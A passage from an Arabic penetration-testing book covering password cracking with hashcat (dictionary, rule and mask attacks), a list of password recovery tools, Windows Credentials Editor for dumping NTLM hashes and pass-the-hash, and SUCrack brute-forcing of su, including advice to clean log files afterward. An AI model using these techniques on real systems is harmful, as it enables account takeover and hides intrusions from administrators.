‫دﻋوﻧﺎ ﻧﻠﻘﻲ ﻧظرة ﻋﻠﻰ ﺑﻌض ﻣن ﻛﻠﻣﺎت اﻟﺳر أﺻﻌب ﻣﻣﺎ ﺳﺑﻖ ﻣﻊ ‪ .Hashcat‬وﻟﯾﻛن ﻣﺛﻼ ﻣﺛل اﻻﺗﻲ‪:‬‬ ‫‪-‬‬

‫ﺛم ﻧﻘوم ﺑﺣﻔظﮭﺎ ﻓﻲ اﻟﻣﻠف ‪.hash.txt‬‬ ‫‪-‬‬


‫ﻧﻘوم اﻻن ﺑﻔﺗﺢ اﻟﺗرﻣﻧﺎل وﻛﺗﺎﺑﺔ اﻻﻣر اﻟﺗﺎﻟﻲ‪:‬‬ ‫‪-‬‬
‫‪#hashcat -m 1000 hash.txt rockyou.txt -o hardcracked.txt‬‬
‫ﻓﯾﻣﺎ ﯾزﯾد ﻗﻠﯾﻼ ﻋﻠﻰ اﻟﺛواﻧﻲ ﺳوف ﺗﺷﺎھد ھذا‪:‬‬ ‫‪-‬‬

‫ﻧﻼﺣظ ھﻧﺎ اﻧﮭﺎ اﺧذت ﻣن اﻟوﻗت ﻣﻘدار ‪ 4‬ﺛواﻧﻲ‪ .‬وﻗﺎﻣت ﺑﻛﺳر اﺛﻧﯾن ﻣن اﻟﮭﺎش ﻓﻘط ﻣن أﺻل ﺧﻣﺳﮫ‪.‬‬ ‫‪-‬‬

‫‪ -‬ﻋﻧد ﻋدم اﻟﻧﺟﺎح ﻓﻲ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ﻧﺣﺎول اﺳﺗﺧدام ﻣﻠف ﻗﺎﻣوس أﻛﺑر‪.‬‬
‫‪ -‬ﻓﻠﻧﺣﺎول ﺗﺣﻣﯾل ھذا اﻟﻘﺎﻣوس ﻣن اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ اﻟذي ﺳوف ﯾزﯾد ﻋن ‪ 5‬ﺟﯾﺟﺎ‪.‬‬
‫‪https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm‬‬
‫‪ -‬ﺛم ﻧﻔﺗﺢ اﻟﺗرﻣﻧﺎل وﻧﺳﺗﺧدم اﻻﻣر اﻟﺗﺎﻟﻲ‪:‬‬
‫‪#hashcat -m 1000 hash.txt crackstation.txt -o hardcracked.txt --remove‬‬
‫ﻧﻼﺣظ ھﻧﺎ وﺟود ﺗﻐﯾرﯾن ﻋن اﻻﻣر اﻟﺳﺎﺑﻖ‪ ،‬أوﻻ ﻗﻣﻧﺎ ﺑﺗﻐﯾر اﻟﻘﺎﻣوس اﻟﻣﺳﺗﺧدم ﻣن ‪ rockyou.txt‬اﻟﻰ ‪ crackstation.txt‬اﻟذي ﻗﻣﻧﺎ‬
‫ﺑﺗﺣﻣﯾﻠﮫ‪ .‬ﺛﺎﻧﯾﺎ ﻗﻣﻧﺎ ﺑﺎﺳﺗﺧدام اﻟﺧﯾﺎر ‪ --remove‬وھذا اﻟﺧﯾﺎر ﯾﺳﺗﺧدم ﻣﻊ ﻣﻠﻔﺎت اﻟﻘﺎﻣوس اﻟﻌﻣﻼﻗﺔ ﺣﯾث اﻧﮫ ﺳوف ﯾزﯾل اﻟﻛﻠﻣﺎت اﻟﻣﻘﺎﺑﻠﺔ ﻟﻠﮭﺎش‬
‫اﻟدى ﺗم ﻛﺳره‪ ،‬ھذا اﻟﺧﯾﺎر ﻏﯾر ﻣﮭﻣﮫ ﻓﻲ ﻣﻠﻔﺎت اﻟﻘﺎﻣوس اﻟﺻﻐﯾرة‪.‬‬
‫‪ -‬ﻣﻊ ﺑﻌض ﻣن اﻟوﻗت ﺳوف ﯾﻛون اﻟﻧﺎﺗﺞ ﻛﺎﻻﺗﻰ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪383‬‬

‫ﻧﺟد اﻧﮫ اﺧذ ﻣﻘدار ﻣن اﻟوﻗت ﯾﻌﺎدل ‪ 11‬دﻗﯾﻘﮫ وﻗﺎم ھﻧﺎ ﺑﻛﺳر ﺛﻼﺛﺔ ﻣن ھﺎش ﻛﻠﻣﺎت اﻟﻣرور ﻣن أﺻل ﺧﻣﺳﮫ وﻟﻛن ﻧﻼﺣظ اﻧﮫ‬ ‫‪-‬‬
‫ﻣﺎزال ھﻧﺎك اﺛﻧﯾن ﻣن اﻟﮭﺎش ﻟم ﯾﺗم ﻛﺳرھﻣﺎ ﺣﺗﻰ اﻻن‪.‬‬

‫‪ -‬ﻟذﻟك ﺳوف ﻧﺳﺗﺧدم ﺗﻘﻧﯾﺎت ﻣﺗﻘدﻣﺔ‪.‬‬


‫‪More advanced cracking‬‬
‫ﺑﻣﺟرد اﺳﺗﺧدام ﻣﻠف اﻟﻘﺎﻣوس ﺿد ﻗﺎﺋﻣﺔ اﻟﮭﺎش ﻓﺎن ﺗﻘوم ﺑﺎﺳﺗﻌﺎدة ﺑﻌض ﻣن أﺳﮭل ﻛﻠﻣﺎت اﻟﻣرور‪ ،‬وﻟﻛن اﻟﺣﺻول ﻋﻠﻰ اﻷﺻﻌب ﻣﻧﮭﺎ ﺗﺣﺗﺎج‬
‫اﻟﻰ ﺗﻘﻧﯾﺎت أﻛﺛر ﺗﻘدﻣﺎ‪ .‬واﻟﺗﻲ ﺳوف ﻧﻐطﯾﮭﺎ اﻻن‪ Hashcat ،‬ﯾﺗﯾﺢ ﻟك اﺳﺗﺧدام أﻧواع ﻣﺗﻌددة ﻣن اﻟﮭﺟوم‪:‬‬
‫‪Multiple Wordlists‬‬
‫‪Rule Sets‬‬
‫‪Password Masks.‬‬
‫‪ -1‬ﻧوع اﻟﮭﺟوم )‪ (Attack type‬ﺣﯾث ﯾﺗﯾﺢ اﺳﺗﺧدام اﻟﺧﯾﺎر )‪ (-a‬ﻟﺗﺣدﯾد ﻧوع اﻟﮭﺟوم اﻟﻣﺳﺗﺧدم ﻟﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور ﻣن ﺧﻼل‬
‫اﻟﺧﯾﺎرات اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫ﻣﻌظﻣﮭﺎ ﻻ ﺗﺣﺗﺎج إﻟﻰ ﺷرح‪ Combination Attack .‬ﺗﺳﻣﺢ ﻟك ﺑﺎﻟﺟﻣﻊ ﺑﯾن ﻛﻠﻣﺎت ﻣن اﻟﻘواﻣﯾس ﻹﻧﺷﺎء ﻛﻠﻣﺎت ﺟدﯾدة‪.‬‬
‫‪Rule based attacks -2‬‬
‫ھﻲ ﻣﻔﯾدة ﺟدا ‪ .‬ﺣﯾث ﯾﻣﻠك ‪ hashcat‬ﻗﺎﺋﻣﺔ ﻣن اﻟﻘواﻋد اﻟﺗﻲ ﺑﻧﯾت واﻟﺗﻲ ﯾﻣﻛﻧك اﺳﺗﺧداﻣﮭﺎ ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر‪ .‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ھﻧﺎك ﻗﺎﻋدة‬
‫"‪ "leet‬وھﻲ ﻣﺟﻣوﻋﺔ اﻟﻘواﻋد اﻟﺗﻲ ﺗﺄﺧذ ﻛل ﻛﻠﻣﺎت اﻟﻘﺎﻣوس ﺗﻠﻘﺎﺋﯾﺎ وﺗﺣﺎول اﺻدار ﻣﺧﺗﻠف ﻣن اﻟﻛﻠﻣﺎت ‪ .leet-speak versions‬ﯾﻣﻛﻧك‬
‫اﯾﺿﺎ اﺳﺗﺧدام ‪ Rule based attack‬ﻣﺛل ﻟﻐﺎت اﻟﺑرﻣﺟﺔ ﻹﻧﺷﺎء ‪ rulesets‬اﻟﺧﺎﺻﺔ ﺑك‪ .‬ﯾﺗم ﺗﻣﻛﯾن ھذا اﻟﻧوع ﻣن اﻟﮭﺟﻣﺎت ﺑﺎﺳﺗﺧدام اﻟﺗﻌﺑﯾر‬
‫)‪ (-r‬ﺛم اﺳم ‪ rules‬اﻟﺗﻲ ﺗرﯾدھﺎ‪.‬‬
‫ﻣن أﺷﮭر ھذه ‪ rules‬ﻛﺎﻻﺗﻰ‪:‬‬
‫‪Best64.rule, passwordspro.rule, d3ad0ne.rule, and leetspeak.rule‬‬
‫ﯾﻣﻛﻧك أﯾﺿﺎ اﻻطﻼع ﻋﻠﻰ ﻣزﯾد ﻣن اﻟﻘواﻋد ﻣن ﺧﻼل زﯾﺎرة اﻟراﺑط اﻟﺗﺎﻟﻲ‪:‬‬
‫‪http://hashcat.net/wiki/doku.php?id=rule_based_attack‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪384‬‬

‫‪Mask attacks -3‬‬


‫ﺗﺳﻣﺢ ﻟك ﺑﺗﺣدﯾد ﺗﺧطﯾط اﻟﻛﻠﻣﺎت اﻟﺗﻲ ﺳﯾﺗم اﺳﺗﺧداﻣﮭﺎ ﻓﻲ اﻟﮭﺟوم اﻟﺧﺎص ﺑك‪ .‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل إذا ﻛﻧت ﺗﻌرف أن ﻧﮭﺞ ﻛﻠﻣﺔ اﻟﻣرور ﯾﺗطﻠب‬
‫رﻗﻣﯾن وﺳﺗﺔ أﺣرف ﻛﺑﯾرة واﺛﻧﯾن ﻣن اﻷﺣرف اﻟﺧﺎﺻﺔ‪ .‬وﯾﺗم ذﻟك ﺑﺈﻧﺷﺎء ‪ MASK‬ل‪ Hashcat‬ﻟﻼﺳﺗﺧدام ﺣﯾث ﯾﻛون ﺷﻛﻠﮫ ﻛﺎﻻﺗﻰ‪:‬‬
‫‪?d?d?u?u?u?u?u?u?s?s‬‬

‫ﯾﺳﺗﺧدم ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ﻣﻊ ‪ Brute force attack‬وﻓﯾﻣﺎ ﯾﻠﻲ ﻗﺎﺋﻣﮫ ﺑﺎﻟرﻣوز اﻟﺗﻘﻠﯾدﯾﺔ )‪(Charset‬اﻟﻣﺳﺗﺧدﻣﺔ ﻣﻊ ‪:Mask attack‬‬

‫ﯾﻣﻛﻧك أﯾﺿﺎ ﺗﺧﺻﯾص ھذه اﻟرﻣوز )‪ .(Charset‬ﻟﺗﺣدﯾد ﻣﺟﻣوﻋﺔ اﻻﺣرف اﻟﺗﻲ ﺗرﯾد ﺗﺧﺻﯾﺻﮭﺎ )‪ ،(custom charset‬ﻓﻧﺣن ﺑﺣﺎﺟﮫ‬
‫ﻻﺳﺗﺧدام اﻟﺧﯾﺎر)‪ .(-1‬ﺣﯾث ﯾﻣﻛﻧك اﺳﺗﺧدام اﻟﻌدﯾد ﻣن ﺗﺧﺻﯾص اﻻﺣرف )‪ (custom charset‬ﻛﻣﺎ ﺗرﯾد طﺎﻟﻣﺎ ﺗم ﺗﺣدﯾدھﺎ ﻣﻊ اﻟﻌدد )‪.(1-n‬‬
‫ﯾﺗم ﺗﻣﺛﯾل ﻛل ﺣرف ﻣﺧﺻص ﺑﺎﻟﻌﻼﻣﺔ اﻻﺳﺗﻔﮭﺎم )؟( وﯾﺗﺑﻌﮫ ﻧوع اﻟﺣرف‪.‬‬

‫أﻣﺛﻠﮫ‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


385

OclHashcat
‫ﺗدﻋم اﻟﺗوﻗف‬-‫ﺗدﻋم ﻛروت اﻟﺷﺎﺷﺔ اﻟﻣﺧﺗﻠﻔﺔ‬- ‫ﺗدﻋم اﻧظﻣﺔ اﻟﺗﺷﻐﯾل اﻟﻣﺧﺗﻠﻔﺔ‬- ‫ ﻣﺟﺎﻧﯾﺔ‬:‫ﻣن اﻗوى وأﺳرع اﻷدوات ﻓﻲ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ﻷﻧﮭﺎ‬
.‫ ﻧوﻋﺎ ﻣن اﻧواع اﻟﮭﺎش‬50 ‫ﺗدﻋم أﻛﺛر ﻣن‬- ‫ﺗدﻋم أﻛﺛر ﻣن طرﯾﻘﺔ ھﺟوم‬-‫واﻻﺳﺗﻣرار‬

‫ ﺑﺎﻹﺿﺎﻓﺔ اﻧﮭﺎ ﺗﻌﻣل ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل‬.GPU ‫ وﻟﻛﻧﮭﺎ ﺗﺧﺗﻠف ﻋﻧﮭﺎ ﺑﺗدﻋﯾﻣﮭﺎ اﺳﺗﺧدام‬hashcat ‫ﺗﺳﺗﺧدم ﻧﻔس اﻟﺧﯾﺎرات اﻟﻣﺳﺗﺧدﻣﺔ ﻣﻊ اﻷداة‬
.‫وﯾﻧدوز ﺑﺟﺎﻧب اﻟﻠﯾﻧﻛس‬

Other Password Cracking Tools

،‫ ﻣﺳؤول اﻟدوﻣﯾن‬،‫أدوات ﻛﺳر ﻛﻠﻣﺔ ﻣرور ﺗﺳﻣﺢ ﻟك ﻹﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺎت ﻣرور ﻟﻣﺳؤول ﻏﯾر ﻣﻌروف أو ﺗم ﻓﻘداﻧﮭﺎ ﻋﻠﻰ اﻟﻣﺳﺗوى اﻟﻣﺣﻠﻲ‬
‫ ﺣﺗﻰ أﻧﮫ ﯾﺳﻣﺢ ﻟﻠﻣﺳﺗﺧدﻣﯾن ﻟﻠوﺻول إﻟﻰ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎﺻﺔ ﺑﮭم اﻟﻣؤﻣن ﻋﻠﻰ اﻟﻔور دون‬.‫وﻏﯾرھﺎ ﻣن ﻛﻠﻣﺎت ﻣرور ﺣﺳﺎب اﻟﻣﺳﺗﺧدم‬
:‫ وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض أدوات ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‬.‫ ﻓﻲ ﺣﺎﻟﺔ ﻧﺳﯾﺎن ﻛﻠﻣﺔ اﻟﺳر‬،‫إﻋﺎدة ﺗﺛﺑﯾت وﯾﻧدوز‬
Password Unlocker Bundle available at http://www.passwordunlocker.com
Proactive System Password Recovery available at http://www.elcomsoft.com
Windows Password Cracker available at http://www.windows-password-cracker.com
WinPassword available at http://lastbit.com/
Passware Kit Enterprise available at http://www.lostpassword.com
PasswordsPro available at http://www.insidepro.com
LSASecretsView available at http://www.nirsoft.net
LCP available at http://www.lcpsoft.com
Password Cracker available at http://www.amlpages.com
Kon-Boot available at http://www.thelead82.com
Windows Password Recovery Tool available at http://www.windowspasswordsrecovery.com
Hash Suite available at http://hashsuite.openwall.net
SAMlnside available at http://www.insidepro.com
Windows Password Recovery available at http://www.passcape.com
Password Recovery Bundle available at http://www.top-password.com

https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬


‫‪386‬‬

‫‪Krbpwguess available at http://www.cqure.net‬‬


‫‪Windows Password Breaker Enterprise available at http://www.recoverwindowspassword.com‬‬
‫‪Rekevsoft Windows Password Recovery Enterprise available at http://www.rekeysoft.com‬‬

‫ﺑﻌض اﻟﺗﻘﻧﯾﺎت اﻷﺧرى ﻓﻲ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور‬

‫)‪Windows Credentials Editor (WCE‬‬


‫اﻟﻣﺻدر‪http://www.ampliasecurity.com/research/windows-credentials-editor :‬‬
‫)‪ Windows Credentials Editor (WCE‬ھﻲ أداة أﻣﻧﯾﺔ ﻟﺳرد ﺟﻠﺳﺎت ﺗﺳﺟﯾل اﻟدﺧول وإﺿﺎﻓﺔ أو ﺗﻐﯾﯾر اﻟﻘﺎﺋﻣﺔ وﺣذف ﺑﯾﺎﻧﺎت‬
‫اﻻﻋﺗﻣﺎد اﻟﻣرﺗﺑطﺔ ﺑﮭﺎ )ﻣﺛﻼ‪ :‬ھﺎش ‪ ،LM / NT‬ﻛﻠﻣﺎت اﻟﺳر اﻟﻐﯾر ﻣﺷﻔرة وﺗذاﻛر ‪ .(kerberos‬ھذه اﻷداة ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ‪ ،‬ﻋﻠﻰ ﺳﺑﯾل‬
‫اﻟﻣﺛﺎل‪ ،‬ﻷداء ﺗﻣرﯾر اﻟﮭﺎش )‪ (pass the hash‬ﻋﻠﻰ وﯾﻧدوز‪ ،‬ﻋن طرﯾﻖ اﻟﺣﺻول ﻋﻠﻰ اﻟﮭﺎش ‪ NT/LM‬ﻣن اﻟذاﻛرة )ﻣن ﺗﺳﺟﯾﻼت دﺧول‬
‫اﻟﺗﻔﺎﻋﻠﯾﺔ‪ ،‬واﻟﺧدﻣﺎت‪ ،‬اﺗﺻﺎﻻت ﺳطﺢ اﻟﻣﻛﺗب اﻟﺑﻌﯾد‪ ،‬اﻟﺦ(‪ ،‬واﻟﺣﺻول ﻋﻠﻰ ﺗذاﻛر ‪ Kerberos‬وإﻋﺎدة اﺳﺗﺧداﻣﮭﺎ ﻓﻲ ﻧظﺎم وﯾﻧدوز أﺧر أو‬
‫ﻧﺎظم ﯾوﻧﻛس‪ ،‬وﺗﻔرﯾﻎ ﻧص ﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﯾﻘوم اﻟﻣﺳﺗﺧدم ﺑﺈدﺧﺎﻟﮭﺎ ﻋﻧد ﺗﺳﺟﯾل اﻟدﺧول‪ WCE .‬ھو أداة أﻣﻧﯾﺔ ﺗﺳﺗﺧدم ﻋﻠﻰ ﻧطﺎق واﺳﻊ‬
‫ﻣن ﻗﺑل اﻟﻣﺗﺧﺻﺻﯾن ﻓﻲ ﻣﺟﺎل اﻷﻣن ﻟﺗﻘﯾﯾم أﻣن ﺷﺑﻛﺎت وﯾﻧدوز ﻋن طرﯾﻖ اﺧﺗﺑﺎر اﻻﺧﺗراق‪ .‬وھﻲ ﺗدﻋم وﯾﻧدوز إﻛس ﺑﻲ‪ ،2003 ،‬ﻓﯾﺳﺗﺎ‪،7 ،‬‬
‫‪ 2008‬وﯾﻧدوز ‪.8‬‬

‫ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﺑواﺳطﺔ ﻣﮭﺎﺟم ذات اﻟﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ ﻋن طرﯾﻖ ﺣﻘﻧﮭﺎ ﻓﻲ ﻧظﺎم اﻟوﯾﻧدوز اﻟﮭدف ﺑواﺳطﺔ‬
‫‪ meterpreter‬ﻛﻣﺎ ﻓﻌﻠﻧﺎ ﺳﺎﺑﻘﺎ ﻣﻊ ‪.hashdump7‬‬
‫ﯾوﺟد ﻧﺳﺧﮫ ﻣن ھذا اﻟﻣﻠف ﻓﻲ اﻟﻣﺳﺎر ‪ /usr/share/wce‬واﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز‪.‬‬
‫اﻟﺻﯾﻐﺔ اﻟﻌﺎﻣﺔ ﻟﮫ ﻛﺎﻻﺗﻰ‪:‬‬
‫]‪C:\cwe\> cwe.exe [options‬‬
‫ﻣﺛﺎل‪:‬‬

‫اﻟﺧﯾﺎرات اﻟﻣﺳﺗﺧدﻣﺔ ﻣﻌﮫ ﻛﺎﻻﺗﻰ‪:‬‬


‫ﯾﺟب ان ﻧﻼﺣظ ان ھذه اﻷداة ﺗﺷﺑﮫ ‪ mimikatz‬ﺣﯾث ﺗﺗﻌﺎﻣل ﻓﻲ ﻣﻌظﻣﮭﺎ ﻣﻊ اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﺗم ﺗﺳﺟﯾﻠﮭﺎ ﻓﻲ اﻟذاﻛرة‬
‫‪-l‬‬ ‫‪List logon sessions and NTLM credentials (default).‬‬
‫ﯾﺳﺗﺧدم ﻟﻌرض ﻗﺎﺋﻣﺔ ﻣن ﻗﺎم ﺑﺗﺳﺟﯾل اﻟدﺧول ﻓﻲ اﻟوﯾﻧدوز واﻟﮭﺎش اﻟﺧﺎص ﺑﮫ وھذا ھو اﻟوﺿﻊ اﻻﻓﺗراﺿﻲ ﻋﻧد اﺳﺗﺧدام ‪ wce‬ﺑدون أي‬
‫ﺗﻌﺑﯾرات‪.‬‬
‫‪-s‬‬ ‫‪Change NTLM credentials of current logon session.‬‬
‫ﯾﻘوم ﺑﺗﻐﯾر ھﺎش ‪ NTLM‬ﻓﻲ ﺑﯾﺎﻧﺎت ﻣﺳﺗﺧدم ﻣﻌﯾن ﻣﻣن ﻗﺎم ﺑﺗﺳﺟﯾل اﻟدﺧول او اﻋداد ﺑﯾﺎﻧﺎت ﺟدﯾده‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪387‬‬

‫‪-r‬‬ ‫‪List logon sessions and NTLM credentials indefinitely. Refresh every 5 seconds if new sessions.‬‬
‫ﺗﺳﺗﺧدم ﻟﻌرض ﻗﺎﺋﻣﺔ ﻣن ﻗﺎم ﺑﺗﺳﺟﯾل اﻟدﺧول ﻓﻲ اﻟوﯾﻧدوز واﻟﮭﺎش اﻟﺧﺎص ﺑﮫ‪ .‬ﺛم ﺗﻘوم ﺑﻌﻣل ﻓﺣص ﻛل ‪ 5‬ﺛواﻧﻲ ﻟﺗﺳﺟﯾل أي ﺟﻠﺳﺔ دﺧول‬
‫ﺟدﯾده‪.‬‬
‫‪-c‬‬ ‫‪Run in a new session with the specified NTLM credentials.‬‬
‫اﻧﺷﺎء ﺟﻠﺳﺔ ﺟدﯾده ﻣﻊ ﺑﯾﺎﻧﺎت اﻋﺗﻣﺎد ھﺎش ﻣﻌﯾن‪.‬‬
‫‪-e‬‬ ‫‪List logon sessions NTLM credentials indefinitely. Refresh every time a logon event occurs.‬‬
‫ﻣﺛل اﻟﺧﯾﺎر )‪ (-r‬وﻟﻛن ﯾﺗم إﻋﺎدة اﻟﻔﺣص ﻛﻠﻣﺎ ﻧﺷﺎء ﺗﺳﺟﯾل دﺧول ﺟدﯾد‪.‬‬
‫>‪-o <file‬‬ ‫‪save all output to a file.‬‬
‫ﻹﻧﺷﺎء ھﺎش ﻣن اﻟﻧوع ‪ NTLM‬ﻟﻛﻣﻠﺔ ﻣرور ﻣﻌﯾﻧﮫ ﯾﺗم ذﻟك ﻋن طرﯾﻖ اﻻﺗﻲ‪:‬‬
‫>‪wce.exe -g <cleartext password‬‬
‫‪For example:‬‬
‫‪C:\Users\test>wce.exe -g mypassword‬‬
‫‪WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa‬‬
‫)‪([email protected]‬‬
‫‪Use -h for help.‬‬
‫‪Password: mypassword‬‬
‫‪Hashes: 74AC99CA40DED420DC1A73E6CEA67EC5:A991AE45AA987A1A48C8BDC1209FF0E7‬‬

‫‪CmosPwd‬‬
‫ﯾﺳﺗﺧدم ‪ CmosPwd‬ﻟﻛﺳر ﻛﻠﻣﺔ ﻣرور ‪ CmosPwd .(Basic Input Output System)BIOS‬ﯾﺗﯾﺢ ﻟك ﻣﺣو‪/‬ﻗﺗل‪ ،‬اﻟﻧﺳﺦ‬
‫اﻻﺣﺗﯾﺎطﻲ‪ ،‬او اﺳﺗﻌﺎدة ‪.CMOS‬‬

‫‪Physical access attacks with sucrack‬‬


‫ﻓﻲ ھﺬه اﻟﺠﺰء‪ ،‬ﺳﻮف ﻧﺴﺘﺨﺪم ‪ SUCrack‬ﻟﺘﻨﻔﯿﺬ ھﺠﻮم اﻟﻮﺻﻮل اﻟﻤﺎدي ﻟﻜﻠﻤﺔ اﻟﻤﺮور)‪. (Physical access password attacks‬‬
‫‪ SUCrack‬ھﻲ أداة ﻣﺘﻌﺪدة اﻟﻌﻤﻠﯿﺎت )‪ (multi threat‬واﻟﺘﻲ ﺗﺴﻤﺢ ﺑﮭﺠﻮم اﻟﻘﻮة اﻟﻐﺎﺷﻤﺔ )‪ (brute force attack‬ﻟﻜﺴﺮ ﺣﺴﺎﺑﺎت‬
‫اﻟﻤﺴﺘﺨﺪﻣﯿﻦ اﻟﻤﺤﻠﯿﺔ ﻋﺒﺮ اﻻﻣﺮ ‪ .su‬اﻷﻣﺮ ‪ su‬ﻓﻲ ﻟﯿﻨﻜﺲ ﺗﺴﻤﺢ ﻟﻚ ﻟﺘﺸﻐﯿﻞ اﻷواﻣﺮ ﻛﻤﺴﺘﺨﺪم ﺑﺪﯾﻞ‪ .‬ھﺬا اﻟﮭﺠﻮم‪ ،‬ﻋﻠﻰ اﻟﺮﻏﻢ ﻣﻦ اﻧﮫ ﻣﻔﯿﺪ ﻋﻨﺪﻣﺎ‬
‫ﺗﻜﻮن ﻏﯿﺮ ﻗﺎدر ﻋﻠﻰ ﺗﺼﻌﯿﺪ اﻻﻣﺘﯿﺎزات ﻋﻠﻰ ﻧﻈﺎم ﻟﯿﻨﻜﺲ‪/‬ﯾﻮﻧﻜﺲ‪ ،‬وﻟﻜﻨﮫ ﺳﻮف ﯾﻤﻸ ﻣﻠﻔﺎت اﻟﺴﺠﻞ ﺑﺴﺮﻋﺔ ﻓﻠﺬا ﯾﺮﺟﻰ اﻟﺘﺄﻛﺪ ﻣﻦ ﺗﻨﻈﯿﻒ ﻣﻠﻔﺎت‬
‫اﻟﺴﺠﻞ ﺑﻌﺪ اﻻﻧﺘﮭﺎء ‪. SUCrack‬ﻟﺪﯾﮫ ﻋﺪة ﺧﯿﺎرات واﻟﺘﻲ ﯾﻤﻜﻨﻨﺎ اﺳﺘﺨﺪاﻣﮭﺎ‪:‬‬
‫)‪ (--help‬ﯾﺴﻤﺢ ﻟﻚ ﻟﻌﺮض ﻣﻠﻒ اﻟﻤﺴﺎﻋﺪة ل‪.SUCrack‬‬
‫)‪ (-l‬ﯾﺴﻤﺢ ﻟﻚ ﺑﺘﻐﯿﯿﺮ اﻟﻤﺴﺘﺨﺪم اﻟﺬي ﻗﺎم ﺑﺘﺴﺠﯿﻞ اﻟﺪﺧﻮل وﻧﺤﻦ ﻧﺤﺎول اﻻﻟﺘﻔﺎف ﻋﻠﯿﮫ‪.‬‬
‫)‪ (-s‬ﯾﺴﻤﺢ ﻟﻚ ﻟﺘﻌﯿﯿﻦ ﻋﺪد اﻟﺜﻮاﻧﻲ واﻟﺬى ﻋﻨﺪھﺎ ﯾﺘﻢ ﻋﺮض اﻹﺣﺼﺎءات‪ .‬اﻟﻌﺪد اﻻﻓﺘﺮاﺿﻲ ‪ 3‬ﺛﻮاﻧﻲ‪.‬‬
‫)‪ (-a‬ﯾﺴﻤﺢ ﻟﻚ ﻟﺘﺤﺪﯾﺪ ﻣﺎ إذا ﻛﺎﻧﺖ رﻣﻮز ‪ ANSI escape‬ﯾﻨﺒﻐﻲ أن ﺗﺴﺘﺨﺪم أم ﻻ‪.‬‬
‫)‪ (-w‬ﯾﺴﻤﺢ ﻟﻚ ﻟﺘﺤﺪﯾﺪ ﻋﺪد اﻟﻌﻤﻠﯿﺎت اﻟﺘﻲ ﯾﻤﻜﻦ ان ﯾﺴﺘﺨﺪﻣﮭﺎ ‪.SUCrack‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪388‬‬

‫‪ SUCrack‬ﯾﻤﻜﻨﮫ إدارة اﻟﻌﺪﯾﺪ ﻣﻦ اﻟﻌﻤﻠﯿﺎت ﻓﻲ وﻗﺖ واﺣﺪ‪ ,‬وﻟﻜﻦ ﯾﻔﻀﻞ اﺳﺘﺨﺪام واﺣﺪ ﻓﻘﻂ ﺣﯿﺚ ﻛﻠﻤﺎ ﻓﺸﻠﺖ ﻣﺤﺎوﻟﺔ ﺗﺴﺠﯿﻞ اﻟﺪﺧﻮل ﻓﻌﺎدة ﻣﺎ‬
‫ﯾﺘﺴﺒﺐ ﺗﺄﺧﯿﺮ ﺛﻼﺛﺔ ﺛﻮاﻧﻲ ﻗﺒﻞ ﻣﺤﺎوﻟﺔ إدﺧﺎل ﻛﻠﻤﺔ ﻣﺮور أﺧﺮى‪.‬‬
‫ﻛﯿﻒ ﻧﻔﻌﻞ ذﻟﻚ ‪...‬‬
‫‪ -1‬ﻣﻦ اﺟﻞ اﺳﺘﺨﺪام‪ ، SUCrack‬ﯾﺠﺐ ﻋﻠﯿﻚ ﺗﺤﺪﯾﺪ ﻟﻮاﺋﺢ اﻟﻜﻠﻤﺎت ﻋﻨﺪ ﻓﺘﺤﮫ‪ .‬ﺧﻼف ذﻟﻚ‪ ،‬ﺳﻮف ﺗﺤﺼﻞ ﻋﻠﻰ رﺳﺎﻟﺔ ﺧﻄﺎ‪ .‬ﻓﺘﺢ ﻧﺎﻓﺬة‬
